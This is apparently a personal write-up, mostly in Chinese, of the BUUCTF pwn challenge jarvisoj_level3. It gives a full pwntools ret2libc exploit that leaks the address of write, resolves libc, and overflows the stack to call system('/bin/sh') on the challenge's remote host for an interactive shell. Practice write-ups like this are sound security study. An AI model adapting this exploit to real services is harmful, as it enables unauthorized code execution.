BUUCTF jarvisoj_level3

1.Checksec

IDA Pro 静态调试

 

 

栈溢出漏洞，ret2libc

 gdb动态调试

 

 

切入点从泄露write函数入手

 PoC如下：

from pwn import * 
#from LibcSearcher import LibcSearcher
from LibcSearcherX import * #使用 LibcSearcher的原因是 使用上面那个脚本不会出现结果，只会有3个Libc，并且这3个全部是无效的。LibcSearcherX查找到的可以使用，因此不能完全依靠LibcSearcher网站（
 
elf = ELF("/root/Desktop/Pwn Subject/level3")
#libc = ELF("/root/Desktop/Pwn Subject/libc.so.6") 
io = remote("node4.buuoj.cn",25469)
#io = process("/root/Desktop/Pwn Subject/level3")

# Get Pot and Got
write_plt = elf.symbols['write']
write_got = elf.got['write']
main = elf.symbols['main']

# 阶段1 泄露真实地址
print("--------------------------------------------------")
print("[+] Leaking real address ...")
print("[+] Phase 1 Inprogress.")
payload_addr = flat(b'A' * ( 0x88 + 0x4 ) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(4) )
print("[+] Payload = \n",(payload_addr))
io.recvuntil('Input:\n')
io.sendline(payload_addr)
write_addr = u32(io.recv(4))
print("[+] Phase 1 Completed.")
print("--------------------------------------------------")

# 阶段2 通过泄露的真实地址计算出system以及/bin/sh的地址
print("[+] Phase 2 Inprogress.")
print("[+] Trying got system and /bin/sh address though real address")
#libc = LibcSearcher("write",write_addr)

# Dump Dump是给LibcSearcher用的
#libc = LibcSearcherLocal("write",write_addr)	
#libcbase = write_addr - libc.dump('write')
#system = libcbase + libc.dump('system')
#bin_sh = libcbase + libc.dump('str_bin_sh')

# Sym Symbols 是LibcSearcherX的函数调用方式
libc = LibcSearcherLocal("write",write_addr)
libcbase = write_addr - libc.sym['write']
system = libcbase + libc.sym['system']
bin_sh = libcbase + libc.sym['str_bin_sh']

print("[+] Phase 2 Completed")
print("--------------------------------------------------")

# 阶段3 打印各个地址
print("[+] Phase 3 Inprogress.")
print("[+] Real Address: ",hex(write_addr))
print("[+] Base Address: ",hex(write_addr))
print("[+] System Address: ",hex(system))
print("[+] /bin/sh Address: ",hex(bin_sh))
print("[+] Phase 3 Completed")
print("--------------------------------------------------")

# 阶段4 获取shell
payload = (b'A' * ( 0x88 + 0x4 ) + p32(system) + p32(0) + p32(bin_sh) )
io.sendline(payload)
#print("Successfully got shell , Automaticly cat flags ...")
#io.sendline("find . -name 'flag.txt' -exec cat {} \;") #本来打算自动cat flag.txt的，但是连接上去发现会卡shell。
pause()
io.interactive()

成功获取shell并cat flag.txt

今天做了3题ret2libc，都有同样的问题，真是一波三折，终于解决了一个。过段时间看看之前没成功的。